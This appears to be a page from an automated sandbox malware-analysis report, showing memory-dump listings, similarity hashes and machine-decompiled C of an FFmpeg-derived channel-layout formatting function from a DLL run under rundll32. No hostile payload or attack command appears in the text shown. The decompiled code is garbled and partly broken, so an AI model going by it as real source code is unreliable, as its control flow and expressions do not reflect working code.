Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$ByteCharMultiWide$LibraryLoad$_errnomv_calloc$DesktopWindowatoimv_malloczmv_realloc_arraywcslen
String ID: DXVA2CreateDirect3DDeviceManager9$Direct3DCreate9$Direct3DCreate9Ex$Failed to bind Direct3D device to device manager$Failed to create Direct3D device manager$Failed to load D3D9 library$Failed to load DXVA2 library$Failed to locate DXVA2CreateDirect3DDeviceManager9$Failed to open device handle$SetDefaultDllDirectories$Using D3D9Ex device.$d3d9.dll$dxva2.dll
API String ID: 2285110006-3565051934
Opcode ID: 81119a8c00db03e304e4471758cb6eecfd6299740ba6e44e8e551f5fdf6c1372
Instruction ID: 81d1aa8d4d65b830f3c484e294571b6d288d1a976026b3de523a4ddd3e2ab054
Opcode Fuzzy Hash: 81119a8c00db03e304e4471758cb6eecfd6299740ba6e44e8e551f5fdf6c1372
Instruction Fuzzy Hash: B372CFB49097459FD750EF68D58461EBBE1FF88344F91892EE888C7351EB78D844CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1000D4D0 Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 306
COMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E1000D4D0(void* __ebx, void* __edi, void* __esi) {
				char _t142;
				intOrPtr _t144;
				signed int _t145;
				signed int _t148;
				char _t160;
				signed int _t163;
				signed int _t166;
				unsigned int _t178;
				signed int _t182;
				char* _t191;
				char _t192;
				char* _t206;
				void* _t211;
				unsigned int _t227;
				intOrPtr _t238;
				intOrPtr _t241;
				signed int _t243;
				signed int _t250;
				signed int _t272;
				intOrPtr _t273;
				char* _t280;
				unsigned int _t284;
				intOrPtr _t285;
				signed int _t289;
				signed int _t292;
				void* _t293;
				char* _t329;
				unsigned int _t330;
				unsigned int _t332;
				signed int _t333;
				signed int _t337;
				unsigned int _t341;
				unsigned int _t351;
				char* _t353;
				intOrPtr _t379;
				char* _t380;
				signed int _t381;
				signed int _t382;
				char* _t386;
				unsigned int _t387;
				signed int _t388;
				char* _t390;
				signed int _t395;
				void* _t397;
				signed int _t399;
				signed int _t402;
				void* _t403;
				char _t420;
				signed int _t421;
				char* _t423;
				signed int _t425;
				char* _t426;
				char* _t428;
				void* _t431;
				char** _t432;
				char** _t434;
				char** _t435;
				intOrPtr* _t438;
				void* _t440;

				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t432 = _t431 - 0x2c;
				_t423 = _t432[0x10];
				_t432[6] = _t432[0x11];
				_t142 =  *_t423;
				_t440 = _t142 - 2;
				if(_t440 == 0) {
					L60();
					if(_t432[6] >= 0) {
						goto L8;
					} else {
						goto L14;
					}
					goto L12;
				} else {
					if(_t440 > 0) {
						if(_t142 != 3) {
							_t144 = 0xffffffea;
							goto L12;
						} else {
							_t191 = _t432[6];
							_t434 =  &(_t432[0xb]);
							_t353 = _t423;
							_pop(_t273);
							_pop(_t403);
							_pop(_t389);
							_pop(_t427);
							_t428 = _t353;
							_t390 = _t191;
							_push(_t403);
							_push(_t273);
							_t435 = _t434 - 0x4c;
							_t192 =  *_t353;
							if(_t192 == 3) {
								_t206 = _t428[4];
								_t280 =  &(_t206[ !((((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f) + (((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f))]);
								goto L74;
							} else {
								_t332 = _t353[8];
								if(_t192 != 2) {
									_t435[5] = 0x29a;
									_t435[1] = 0;
									 *_t435 = 0;
									_t435[4] = "libavutil/channel_layout.c";
									_t435[3] = "channel_layout->order == AV_CHANNEL_ORDER_CUSTOM";
									_t435[2] = "Assertion %s failed at %s:%d\n";
									E10026560();
									L100A06B8();
									_t438 = _t435 - 0x41c;
									 *((intOrPtr*)(_t438 + 0x418)) = _t273;
									_t238 =  *((intOrPtr*)(_t438 + 0x424));
									_t379 =  *((intOrPtr*)(_t438 + 0x428));
									if(_t238 != 0 || _t379 == 0) {
										 *((intOrPtr*)(_t438 + 8)) = _t379;
										_t285 = _t438 + 0x10;
										 *((intOrPtr*)(_t438 + 4)) = _t238;
										 *_t438 = _t285;
										L100089A0();
										 *((intOrPtr*)(_t438 + 4)) = _t285;
										 *_t438 =  *((intOrPtr*)(_t438 + 0x420));
										_t241 = E1000D4D0(_t285, _t390, _t403);
										if(_t241 >= 0) {
											_t241 =  *((intOrPtr*)(_t438 + 0x14));
										}
									} else {
										_t241 = 0xffffffea;
									}
									return _t241;
								} else {
									_t420 = _t353[4];
									_t380 = 0;
									_t280 = 0xffffffff;
									if(_t420 > 0) {
										do {
											_t206 =  *_t332 - 0x400;
											if(_t206 > 0x3ff) {
												goto L67;
											} else {
												if(_t380 > 0) {
													if( *((intOrPtr*)(_t332 - 0x18)) - 0x400 > 0x3ff || _t206 != _t380) {
														goto L72;
													} else {
														goto L66;
													}
												} else {
													if(_t206 > 0x3ff) {
														goto L67;
													} else {
														if(_t206 == _t380) {
															L66:
															_t280 = _t380;
															goto L67;
														} else {
															goto L72;
														}
													}
												}
											}
											goto L90;
											L67:
											_t380 =  &(_t380[1]);
											_t332 = _t332 + 0x18;
										} while (_t380 != _t420);
										L74:
										if(_t280 < 0) {
											goto L72;
										} else {
											asm("pxor xmm0, xmm0");
											asm("cvtsi2sd xmm0, ebx");
											asm("sqrtsd xmm0, xmm0");
											asm("cvttsd2si eax, xmm0");
											_t406 =  &(_t206[1]) *  &(_t206[1]);
											if(_t406 !=  &(_t280[1])) {
												goto L72;
											} else {
												_t435[2] = _t206;
												_t435[1] = "ambisonic %d";
												 *_t435 = _t390;
												L100089C0();
												_t329 = _t428[4];
												if(_t329 > _t406) {
													_t211 = 0;
													do {
														 *((intOrPtr*)(_t435 + _t211 + 0x28)) = 0;
														 *((intOrPtr*)(_t435 + _t211 + 0x2c)) = 0;
														_t211 = _t211 + 8;
													} while (_t211 < 0x18);
													if( *_t428 == 3) {
														_t330 = _t428[8];
														_t435[0xa] = 1;
														_t284 = _t428[0xc];
														_t435[0xc] = _t330;
														_t435[0xd] = _t284;
														_t227 = (((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 8);
														_t406 = _t227 >> 0x10;
														_t435[0xb] = ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) & 0x0000003f) + (_t227 + (_t227 >> 0x00000010) & 0x0000003f);
													} else {
														_t284 = 2;
														_t435[0xa] = 2;
														_t435[0xb] = _t329 - _t406;
														_t435[0xc] = _t428[8] + (_t406 + _t406 * 2) * 8;
													}
													 *_t435 = _t390;
													_t435[2] = 1;
													_t435[1] = 0x2b;
													L10008D20();
													_t435[1] = _t390;
													 *_t435 =  &(_t435[0xa]);
													E1000D4D0(_t284, _t390, _t406);
												}
												return 0;
											}
										}
									} else {
										L72:
										return 0xffffffea;
									}
								}
							}
						}
					} else {
						if(_t142 == 0) {
							_t148 = _t423[4];
							goto L59;
						} else {
							_t421 = _t423[8];
							_t243 = 4;
							_t333 = 0;
							_t289 = _t423[0xc];
							_t381 = 0;
							while((_t333 ^ _t289 | _t243 ^ _t421) != 0) {
								_t381 =  &(1[_t381]);
								if(_t381 == 0x1f) {
									L14:
									_t145 = _t423[4];
									if(_t145 != 0) {
										_t432[2] = _t145;
										_t432[1] = "%d channels (";
										 *_t432 = _t432[6];
										L100089C0();
										_t395 = _t423[4];
										if(_t395 > 0) {
											_t425 = 0;
											_t386 = _t423;
											goto L19;
											do {
												do {
													L19:
													if(_t425 >= _t395) {
														L57:
														_t432[1] = 0x100b1acf;
														 *_t432 = _t432[6];
														L100089C0();
														goto L24;
													} else {
														_t160 =  *_t386;
														if(_t160 == 2) {
															_t292 =  *(_t386[8] + (_t425 + _t425 * 2) * 8);
															_t250 = _t292 - 0x400;
															if(_t425 != 0) {
																_t432[4] = _t292;
																_t432[1] = 0x100b1acf;
																 *_t432 = _t432[6];
																L100089C0();
																_t292 = _t432[4];
															}
															if(_t250 > 0x3ff) {
																goto L53;
															} else {
																goto L51;
															}
														} else {
															if(_t160 == 3) {
																_t178 = _t386[8];
																_t432[4] = _t178;
																_t432[5] = _t386[0xc];
																_t397 = _t395 - (((((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000010) + (((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) & 0x0000003f) + ((((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f);
																_t272 = _t425 - _t397;
																if(_t425 >= _t397) {
																	goto L32;
																} else {
																	_t250 = 0;
																	if(_t425 == 0) {
																		L51:
																		_t432[2] = _t250;
																		_t432[1] = "AMBI%d";
																		 *_t432 = _t432[6];
																		L100089C0();
																	} else {
																		_t250 = _t425;
																		_t432[1] = 0x100b1acf;
																		_t64 = _t425 + 0x400; // 0x401
																		_t432[4] = _t64;
																		 *_t432 = _t432[6];
																		L100089C0();
																		_t292 = _t432[4];
																		if(_t425 <= 0x3ff) {
																			goto L51;
																		} else {
																			goto L47;
																		}
																	}
																}
															} else {
																if(_t160 == 1) {
																	_t272 = _t425;
																	_t432[4] = _t386[8];
																	_t432[5] = _t386[0xc];
																	L32:
																	_t432[7] = _t425;
																	_t182 = _t432[4];
																	_t292 = 0;
																	_t351 = _t432[5];
																	_t426 = _t386;
																	do {
																		_t387 = _t351;
																		_t399 = (_t387 << 0x00000020 | _t182) >> _t292;
																		_t388 = _t387 >> _t292;
																		if((_t292 & 0x00000020) != 0) {
																			_t399 = _t388;
																		}
																		if((_t399 & 0x00000001) == 0) {
																			goto L34;
																		} else {
																			_t49 = _t272 - 1; // 0x0
																			_t402 = _t49;
																			if(_t272 != 0) {
																				_t272 = _t402;
																				goto L34;
																			} else {
																				_t386 = _t426;
																				_t425 = _t432[7];
																				if(_t425 != 0) {
																					_t432[4] = _t292;
																					_t432[1] = 0x100b1acf;
																					 *_t432 = _t432[6];
																					L100089C0();
																					_t292 = _t432[4];
																					L53:
																					if(_t292 <= 0x28) {
																						goto L41;
																					} else {
																						if(_t292 != 0xffffffff) {
																							goto L47;
																						} else {
																							goto L24;
																						}
																					}
																				} else {
																					if(_t292 > 0x28) {
																						L47:
																						_t432[2] = _t292;
																						_t432[1] = "USR%d";
																						 *_t432 = _t432[6];
																						L100089C0();
																					} else {
																						L41:
																						_t163 =  *(0x100b2280 + _t292 * 8);
																						if(_t163 == 0) {
																							goto L47;
																						} else {
																							_t432[2] = _t163;
																							_t432[1] = "%s";
																							 *_t432 = _t432[6];
																							L100089C0();
																						}
																					}
																				}
																			}
																		}
																		goto L25;
																		L34:
																		_t292 =  &(1[_t292]);
																	} while (_t292 != 0x40);
																	_t386 = _t426;
																	_t425 = _t432[7];
																	if(_t425 == 0) {
																		goto L24;
																	} else {
																		goto L57;
																	}
																	goto L29;
																} else {
																	if(_t425 != 0) {
																		goto L57;
																	}
																	L24:
																	_t432[1] = "NONE";
																	 *_t432 = _t432[6];
																	L100089C0();
																}
															}
														}
													}
													L25:
													if( *_t386 != 2) {
														goto L18;
													} else {
														_t341 = _t386[8];
														_t166 = _t425 + _t425 * 2;
														_t293 = _t341 + _t166 * 8;
														if( *((char*)(_t341 + 4 + _t166 * 8)) == 0) {
															goto L18;
														} else {
															goto L27;
														}
													}
													goto L29;
													L27:
													_t425 =  &(1[_t425]);
													_t432[2] = _t293 + 4;
													_t432[1] = "@%s";
													 *_t432 = _t432[6];
													L100089C0();
													_t395 = _t386[4];
												} while (_t395 > _t425);
												goto L29;
												L18:
												_t395 = _t386[4];
												_t425 =  &(1[_t425]);
											} while (_t395 > _t425);
										}
										L29:
										if(_t395 == 0) {
											goto L15;
										} else {
											_t432[1] = 0x100b1ad1;
											 *_t432 = _t432[6];
											L100089C0();
											_t144 = 0;
										}
									} else {
										L15:
										_t148 = 0;
										L59:
										_t432[2] = _t148;
										_t432[1] = "%d channels";
										 *_t432 = _t432[6];
										L100089C0();
										_t144 = 0;
									}
								} else {
									_t337 = _t381 << 5;
									_t6 = _t337 + 0x100b1c90; // 0x0
									_t243 =  *_t6;
									_t7 = _t337 + 0x100b1c94; // 0x0
									_t333 =  *_t7;
									continue;
								}
								goto L12;
							}
							_t382 = _t381 << 5;
							_t432[1] = "%s";
							_t9 = _t382 + 0x100b1c80; // 0x100b1abb
							_t432[2] =  *_t9;
							 *_t432 = _t432[6];
							L100089C0();
							L8:
							_t144 = 0;
						}
						L12:
						return _t144;
					}
				}
				L90:
			}

0x1000d4d1
0x1000d4d2
0x1000d4d3
0x1000d4d4
0x1000d4db
0x1000d4df
0x1000d4e3
0x1000d4e6
0x1000d4e9
0x1000d586
0x1000d58d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d4ef
0x1000d4ef
0x1000d55b
0x1000d570
0x00000000
0x1000d55d
0x1000d55d
0x1000d561
0x1000d564
0x1000d566
0x1000d567
0x1000d568
0x1000d569
0x1000d911
0x1000d914
0x1000d916
0x1000d917
0x1000d918
0x1000d91b
0x1000d920
0x1000da10
0x1000da15
0x00000000
0x1000d922
0x1000d925
0x1000d928
0x1000db65
0x1000db6f
0x1000db73
0x1000db76
0x1000db7e
0x1000db86
0x1000db8e
0x1000db93
0x1000dba0
0x1000dba6
0x1000dbad
0x1000dbb4
0x1000dbbd
0x1000dbc3
0x1000dbc7
0x1000dbcb
0x1000dbcf
0x1000dbd2
0x1000dbde
0x1000dbe2
0x1000dbe5
0x1000dbec
0x1000dbee
0x1000dbee
0x1000dc00
0x1000dc00
0x1000dc00
0x1000dbff
0x1000d92e
0x1000d92e
0x1000d931
0x1000d933
0x1000d93a
0x1000d963
0x1000d965
0x1000d96f
0x00000000
0x1000d971
0x1000d973
0x1000d94f
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d975
0x1000d97a
0x00000000
0x1000d97c
0x1000d980
0x1000d955
0x1000d955
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d980
0x1000d97a
0x1000d973
0x00000000
0x1000d957
0x1000d957
0x1000d958
0x1000d95b
0x1000da17
0x1000da19
0x00000000
0x1000da1f
0x1000da1f
0x1000da23
0x1000da27
0x1000da2b
0x1000da33
0x1000da38
0x00000000
0x1000da3e
0x1000da3e
0x1000da47
0x1000da4b
0x1000da4e
0x1000da53
0x1000da58
0x1000da5c
0x1000da5e
0x1000da5e
0x1000da62
0x1000da66
0x1000da69
0x1000da72
0x1000dac8
0x1000dad0
0x1000dad4
0x1000dad7
0x1000dadf
0x1000db44
0x1000db4f
0x1000db5c
0x1000da74
0x1000da7a
0x1000da7f
0x1000da85
0x1000da8c
0x1000da8c
0x1000da90
0x1000da9d
0x1000daa1
0x1000daa5
0x1000daae
0x1000dab2
0x1000dab5
0x1000dab5
0x1000dac3
0x1000dac3
0x1000da38
0x1000d93c
0x1000d982
0x1000d98e
0x1000d98e
0x1000d93a
0x1000d928
0x1000d920
0x1000d4f1
0x1000d4f3
0x1000d8e0
0x00000000
0x1000d4f9
0x1000d4f9
0x1000d4fc
0x1000d501
0x1000d503
0x1000d506
0x1000d527
0x1000d510
0x1000d514
0x1000d58f
0x1000d58f
0x1000d594
0x1000d59d
0x1000d5aa
0x1000d5ae
0x1000d5b1
0x1000d5b6
0x1000d5bb
0x1000d5c5
0x1000d5c7
0x1000d5c9
0x1000d5dc
0x1000d5dc
0x1000d5dc
0x1000d5de
0x1000d8be
0x1000d8c3
0x1000d8cb
0x1000d8ce
0x00000000
0x1000d5e4
0x1000d5e4
0x1000d5e9
0x1000d82c
0x1000d82e
0x1000d834
0x1000d836
0x1000d83f
0x1000d847
0x1000d84a
0x1000d84f
0x1000d84f
0x1000d859
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d5ef
0x1000d5f2
0x1000d720
0x1000d726
0x1000d72e
0x1000d7b9
0x1000d7bb
0x1000d7bf
0x00000000
0x1000d7c5
0x1000d7c5
0x1000d7c9
0x1000d85b
0x1000d85b
0x1000d864
0x1000d86c
0x1000d86f
0x1000d7cf
0x1000d7d4
0x1000d7d6
0x1000d7de
0x1000d7e4
0x1000d7e8
0x1000d7eb
0x1000d7f6
0x1000d7fa
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d7fa
0x1000d7c9
0x1000d5f8
0x1000d5f9
0x1000d68b
0x1000d690
0x1000d694
0x1000d698
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x1000d6bc
0x1000d6bc
0x1000d6c0
0x1000d6c3
0x1000d6c8
0x1000d6ca
0x1000d6ca
0x1000d6d2
0x00000000
0x1000d6d4
0x1000d6d4
0x1000d6d4
0x1000d6d9
0x1000d6b0
0x00000000
0x1000d6db
0x1000d6db
0x1000d6dd
0x1000d6e3
0x1000d879
0x1000d882
0x1000d88a
0x1000d88d
0x1000d892
0x1000d896
0x1000d899
0x00000000
0x1000d89f
0x1000d8a2
0x00000000
0x1000d8a8
0x00000000
0x1000d8a8
0x1000d8a2
0x1000d6e9
0x1000d6ec
0x1000d800
0x1000d800
0x1000d80d
0x1000d811
0x1000d814
0x1000d6f2
0x1000d6f2
0x1000d6f2
0x1000d6fb
0x00000000
0x1000d701
0x1000d701
0x1000d70a
0x1000d712
0x1000d715
0x1000d715
0x1000d6fb
0x1000d6ec
0x1000d6e3
0x1000d6d9
0x00000000
0x1000d6b2
0x1000d6b2
0x1000d6b3
0x1000d8b0
0x1000d8b2
0x1000d8b8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d5ff
0x1000d601
0x00000000
0x00000000
0x1000d607
0x1000d610
0x1000d614
0x1000d617
0x1000d617
0x1000d5f9
0x1000d5f2
0x1000d5e9
0x1000d620
0x1000d623
0x00000000
0x1000d625
0x1000d625
0x1000d628
0x1000d631
0x1000d634
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d634
0x00000000
0x1000d636
0x1000d63d
0x1000d63e
0x1000d647
0x1000d64b
0x1000d64e
0x1000d653
0x1000d656
0x00000000
0x1000d5d0
0x1000d5d0
0x1000d5d3
0x1000d5d4
0x1000d5dc
0x1000d660
0x1000d662
0x00000000
0x1000d668
0x1000d671
0x1000d675
0x1000d678
0x1000d67d
0x1000d67d
0x1000d596
0x1000d596
0x1000d596
0x1000d8e3
0x1000d8e3
0x1000d8ec
0x1000d8f4
0x1000d8f7
0x1000d8fc
0x1000d8fc
0x1000d516
0x1000d518
0x1000d51b
0x1000d51b
0x1000d521
0x1000d521
0x00000000
0x1000d521
0x00000000
0x1000d514
0x1000d52f
0x1000d537
0x1000d53b
0x1000d541
0x1000d549
0x1000d54c
0x1000d551
0x1000d551
0x1000d551
0x1000d575
0x1000d57c
0x1000d57c
0x1000d4ef
0x00000000

APIs

mv_bprintf.F072 ref: 1000D54C
mv_bprintf.F072 ref: 1000D8F7

Strings

%d channels (, xrefs: 1000D5A5
%d channels, xrefs: 1000D8E7
NONE, xrefs: 1000D60B
@%s, xrefs: 1000D642
USR%d, xrefs: 1000D808
AMBI%d, xrefs: 1000D85F

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: %d channels$%d channels ($@%s$AMBI%d$NONE$USR%d
API String ID: 3083893021-1306170362
Opcode ID: 98ded283bb3ae70f21cce0f44d25f16bdae0512caeeaba98897a65d1631d7c3f
Instruction ID: 96990cf085468aa9ba630c0c0793423886e9eba89b3e303bf26647e4a11a856d
